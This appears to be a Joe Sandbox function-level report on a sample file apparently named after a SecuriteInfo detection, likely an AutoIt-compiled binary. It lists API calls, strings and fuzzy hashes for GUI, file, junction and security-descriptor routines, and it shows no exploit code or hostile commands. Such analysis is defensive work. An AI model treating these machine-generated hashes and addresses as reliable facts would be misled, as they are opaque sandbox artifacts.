Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: e4dcf35e6a2392ac507f24c7de45171b849387df4eb1ef2cd92a42a90eeb6ac7
Instruction ID: 890d45978cea1bd459a4992d7601e17d24eb0a68f711d28bd0a1acd4d0b90ca6
Opcode Fuzzy Hash: e4dcf35e6a2392ac507f24c7de45171b849387df4eb1ef2cd92a42a90eeb6ac7
Instruction Fuzzy Hash: F231C931A48205B6DB14FAA0CE63FEFB7B8AF60B60F600919F461711D1EF91AF44C651

Uniqueness

Uniqueness Score: -1.00%

Function 009BC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 009BC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009BC4E6
SetWindowTextW.USER32(?,?), ref: 009BC4FD
GetDlgItem.USER32(?,000003EA), ref: 009BC512
SetWindowTextW.USER32(00000000,?), ref: 009BC518
GetDlgItem.USER32(?,000003E9), ref: 009BC528
SetWindowTextW.USER32(00000000,?), ref: 009BC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009BC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009BC569
GetWindowRect.USER32(?,?), ref: 009BC572
SetWindowTextW.USER32(?,?), ref: 009BC5DD
GetDesktopWindow.USER32 ref: 009BC5E3
GetWindowRect.USER32(00000000), ref: 009BC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009BC636
GetClientRect.USER32(?,?), ref: 009BC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009BC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009BC693

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 5c619299a50c78b47e527ec7d98b7cd349b8f48a24b59cd86cbe3b28e59e3513
Instruction ID: 45e1a97dbf0ea275d816b94b882da701b27da077d8ba16d9931a2ee2cf3c611e
Opcode Fuzzy Hash: 5c619299a50c78b47e527ec7d98b7cd349b8f48a24b59cd86cbe3b28e59e3513
Instruction Fuzzy Hash: 63518E70900709EFDB20DFA8DE85BAEBBF9FF44714F004929F686A65A0C774A904DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009EA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009EA4C8
DestroyWindow.USER32(?,?), ref: 009EA542

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009EA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009EA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009EA5F1
DestroyWindow.USER32(00000000), ref: 009EA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00960000,00000000), ref: 009EA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009EA663
GetDesktopWindow.USER32 ref: 009EA67C
GetWindowRect.USER32(00000000), ref: 009EA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009EA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009EA6B3

Part of subcall function 009625DB: GetWindowLongW.USER32(?,000000EB), ref: 009625EC

Strings

tooltips_class32, xrefs: 009EA5B5, 009EA643
0, xrefs: 009EA4DE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: f87b84958940f808179302470d2b751d4f2b6e8e9e12f37b75863f60182b8a68
Instruction ID: 9843b7c577b51a9e0bb23fb60818c36e09723ab45889f82269bfad1257500ce7
Opcode Fuzzy Hash: f87b84958940f808179302470d2b751d4f2b6e8e9e12f37b75863f60182b8a68
Instruction Fuzzy Hash: F271BE70144285AFD721CF28CC59F6A7BE9FB99B04F08492DF9858B2A0C770ED02DB12

Uniqueness

Uniqueness Score: -1.00%

Function 009EC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

DragQueryPoint.SHELL32(?,?), ref: 009EC917

Part of subcall function 009EADF1: ClientToScreen.USER32(?,?), ref: 009EAE1A
Part of subcall function 009EADF1: GetWindowRect.USER32(?,?), ref: 009EAE90
Part of subcall function 009EADF1: PtInRect.USER32(?,?,009EC304), ref: 009EAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 009EC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009EC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009EC9AE
_wcscat.LIBCMT ref: 009EC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 009EC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 009ECA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 009ECA25
SendMessageW.USER32(?,000000B1,?,?), ref: 009ECA47
DragFinish.SHELL32(?), ref: 009ECA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009ECB41

Strings

@GUI_DRAGFILE, xrefs: 009ECAF0
@GUI_DROPID, xrefs: 009ECA6E
@GUI_DRAGID, xrefs: 009ECAB9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: c7c62e1c2145bdf27ca95d3dfb1a6e0e69fec1a905de8d9792391dda4dea5132
Instruction ID: 04f19ecaccb0ea34dd004450858fda3abd44ea994d2f47145bcf7d2d46449b1e
Opcode Fuzzy Hash: c7c62e1c2145bdf27ca95d3dfb1a6e0e69fec1a905de8d9792391dda4dea5132
Instruction Fuzzy Hash: 95615771108381AFC711EFA5DC95E9FBBE8FBC9710F000A2EF591961A1DB709A49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009E46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009E46F6

Strings

COLLAPSE, xrefs: 009E473C
UNCHECK, xrefs: 009E48D2
GETTEXT, xrefs: 009E4849
SELECT, xrefs: 009E48A7
GETSELECTED, xrefs: 009E4806
GETITEMCOUNT, xrefs: 009E47D8
EXISTS, xrefs: 009E475F
EXPAND, xrefs: 009E47A8
CHECK, xrefs: 009E4716
GETTOTALCOUNT, xrefs: 009E46DD
ISCHECKED, xrefs: 009E4879

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: f3b108607ec3730909c80295f4c31f914f13f3fda6b295a3c3f2d395a8750e9b
Instruction ID: e081b10ff8e4d6b27b7fe00166687f3bb5b781f2011089d0e80d7d1f007851d0
Opcode Fuzzy Hash: f3b108607ec3730909c80295f4c31f914f13f3fda6b295a3c3f2d395a8750e9b
Instruction Fuzzy Hash: EE916C342043419FCB15EF25C551BAAB7A6AFD4314F04886CF8965B3A2CB35FD4ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 009EBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009EBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009E9431), ref: 009EBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009EBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EBC7D
FreeLibrary.KERNEL32(?), ref: 009EBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009EBC99
DestroyIcon.USER32(?,?,?,?,?,009E9431), ref: 009EBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009EBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009EBCD1

Part of subcall function 0098313D: __wcsicmp_l.LIBCMT ref: 009831C6

Strings

.dll, xrefs: 009EBB27
.exe, xrefs: 009EBB04
.icl, xrefs: 009EBAE4

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: df68aa5af67c287ecd0cc29767f62f2b2a05c59c11afdf8c62b89461ff05856a
Instruction ID: 0e8e2d4ff518261e9dcc7df4e456065f67b4afef0c8a00ef2de40a8a7dc61b57
Opcode Fuzzy Hash: df68aa5af67c287ecd0cc29767f62f2b2a05c59c11afdf8c62b89461ff05856a
Instruction Fuzzy Hash: 2061FF71504298BAEB15DF69CC85FBF77ACEB08710F20461AF915DA1D0DB74AE80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009CA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

CharLowerBuffW.USER32(?,?), ref: 009CA636
GetDriveTypeW.KERNEL32 ref: 009CA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CA730

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

Strings

close, xrefs: 009CA63C
set cd door , xrefs: 009CA6D1
closed, xrefs: 009CA64A, 009CA653
close cd wait, xrefs: 009CA71B
open, xrefs: 009CA65D
open , xrefs: 009CA692
wait, xrefs: 009CA6ED
type cdaudio alias cd wait, xrefs: 009CA6AE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: a983de27e4bb9ce9473d2e63ad17cdd5511bc8c2e49d6bdd1c0bb1463647598d
Instruction ID: 892bc05daae275a81f4b91e0750a00a33dd56a68e998e37c2db90012f7fceba8
Opcode Fuzzy Hash: a983de27e4bb9ce9473d2e63ad17cdd5511bc8c2e49d6bdd1c0bb1463647598d
Instruction Fuzzy Hash: F95129715043059FC700EF20C991A6AB7F8FF98758F14496DF89A572A1DB31AE0ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 009CA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009CA47A
__swprintf.LIBCMT ref: 009CA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 009CA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009CA4FE
_memset.LIBCMT ref: 009CA51D
_wcsncpy.LIBCMT ref: 009CA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009CA58E
CloseHandle.KERNEL32(00000000), ref: 009CA599
RemoveDirectoryW.KERNEL32(?), ref: 009CA5A2
CloseHandle.KERNEL32(00000000), ref: 009CA5AC

Strings

\, xrefs: 009CA4B2
\??\%s, xrefs: 009CA496
:, xrefs: 009CA4BD

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 2aec46629aeede308463d9a286108878cae1b90bd0fab72b12e2e6b1d01427e7
Instruction ID: 2e5d79db0b9e81e6a76a9c8fc3256bdc3730fe20a78d93d5ba6612dbf7175984
Opcode Fuzzy Hash: 2aec46629aeede308463d9a286108878cae1b90bd0fab72b12e2e6b1d01427e7
Instruction Fuzzy Hash: F8318075904149ABDB219FA0DC89FEF73BCEF88745F1041BAFA08D6160E7709B458B25

Uniqueness

Uniqueness Score: -1.00%

Function 009CDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 009CDC7B
_wcscat.LIBCMT ref: 009CDC93
_wcscat.LIBCMT ref: 009CDCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009CDCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 009CDCCE
GetFileAttributesW.KERNEL32(?), ref: 009CDCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 009CDD00
SetCurrentDirectoryW.KERNEL32(?), ref: 009CDD12

Strings

*.*, xrefs: 009CDD51

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 14b8100f6e9a1abd8108f5a5cefa3f20b35da4d7bfa39472ed180954fe4dd425
Instruction ID: eb62e8786365d7c740aa286625b2976c2a71df615d5ed70a07172f6d5412da8b
Opcode Fuzzy Hash: 14b8100f6e9a1abd8108f5a5cefa3f20b35da4d7bfa39472ed180954fe4dd425
Instruction Fuzzy Hash: 428162719052419FCB24EF64C845E6AB7E8BB88350F198C3EF88AC7251E734ED45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009EC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009EC4EC
GetFocus.USER32 ref: 009EC4FC
GetDlgCtrlID.USER32(00000000), ref: 009EC507
_memset.LIBCMT ref: 009EC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009EC65D
GetMenuItemCount.USER32(?), ref: 009EC67D
GetMenuItemID.USER32(?,00000000), ref: 009EC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009EC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009EC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009EC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009EC779

Strings

0, xrefs: 009EC62A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: be92e9b7cc624ae3c696e18de54c6e82485690967984a33d5f017626999db933
Instruction ID: 748cf399389dff525cc4c1e21dfe5bd5a4739ed7669a8ac03d4f97644b5587fd
Opcode Fuzzy Hash: be92e9b7cc624ae3c696e18de54c6e82485690967984a33d5f017626999db933
Instruction Fuzzy Hash: B58180B1108381AFD711DF15D884A6BBBE9FB88714F00492EF99597291DB31ED06CF92

Uniqueness

Uniqueness Score: -1.00%

Function 009B83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009B8766
Part of subcall function 009B874A: GetLastError.KERNEL32(?,009B822A,?,?,?), ref: 009B8770
Part of subcall function 009B874A: GetProcessHeap.KERNEL32(00000008,?,?,009B822A,?,?,?), ref: 009B877F
Part of subcall function 009B874A: HeapAlloc.KERNEL32(00000000,?,009B822A,?,?,?), ref: 009B8786
Part of subcall function 009B874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009B879D

Part of subcall function 009B87E7: GetProcessHeap.KERNEL32(00000008,009B8240,00000000,00000000,?,009B8240,?), ref: 009B87F3
Part of subcall function 009B87E7: HeapAlloc.KERNEL32(00000000,?,009B8240,?), ref: 009B87FA
Part of subcall function 009B87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009B8240,?), ref: 009B880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009B8458
_memset.LIBCMT ref: 009B846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009B848C
GetLengthSid.ADVAPI32(?), ref: 009B849D
GetAce.ADVAPI32(?,00000000,?), ref: 009B84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009B84F6
GetLengthSid.ADVAPI32(?), ref: 009B8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009B8522
HeapAlloc.KERNEL32(00000000), ref: 009B8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009B854A
CopySid.ADVAPI32(00000000), ref: 009B8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009B8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009B85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009B85BC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1054eb215a7f2ef7b4959350e45a4efb0f5553c0bf5e3e255bbd05c7be5f1257
Instruction ID: 9e492e0ff7d04aa22835e9dbfb18472a9ac8964ce0750229772076de49ba7ff1
Opcode Fuzzy Hash: 1054eb215a7f2ef7b4959350e45a4efb0f5553c0bf5e3e255bbd05c7be5f1257
Instruction Fuzzy Hash: A2615B71900209EBDF10DF90DD85AEEBBBDFF48311F04816AF815AA291DB709A04DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009D762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009D76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009D76AE
CreateCompatibleDC.GDI32(?), ref: 009D76BA
SelectObject.GDI32(00000000,?), ref: 009D76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009D771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009D7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009D777B
SelectObject.GDI32(00000006,?), ref: 009D7783
DeleteObject.GDI32(?), ref: 009D778C
DeleteDC.GDI32(00000006), ref: 009D7793
ReleaseDC.USER32(00000000,?), ref: 009D779E

Strings

(, xrefs: 009D7723

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 45c34228bebd3298157e5a64d3c70024ef80f413a4328f1ba61f5c38cfb4450c
Instruction ID: 9eb5cd673e6e9fbb7a73483d141b1e1e9056ecd300dd7f96cb0263f4220f5b58
Opcode Fuzzy Hash: 45c34228bebd3298157e5a64d3c70024ef80f413a4328f1ba61f5c38cfb4450c
Instruction Fuzzy Hash: 1B512875944249EFCB15CFA8CC85EAEBBB9EF48710F14C52AF94997310E631AD408B60

Uniqueness

Uniqueness Score: -1.00%

Function 009CA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,009EFB78), ref: 009CA0FC

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 009CA11E
__swprintf.LIBCMT ref: 009CA177
__swprintf.LIBCMT ref: 009CA190
_wprintf.LIBCMT ref: 009CA246
_wprintf.LIBCMT ref: 009CA264

Strings

Error: , xrefs: 009CA20E
^ ERROR, xrefs: 009CA1E8
Line %d (File "%s"):, xrefs: 009CA171, 009CA18A
"%s" (%d) : ==> %s:, xrefs: 009CA25F
"%s" (%d) : ==> %s:%s%s, xrefs: 009CA241

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

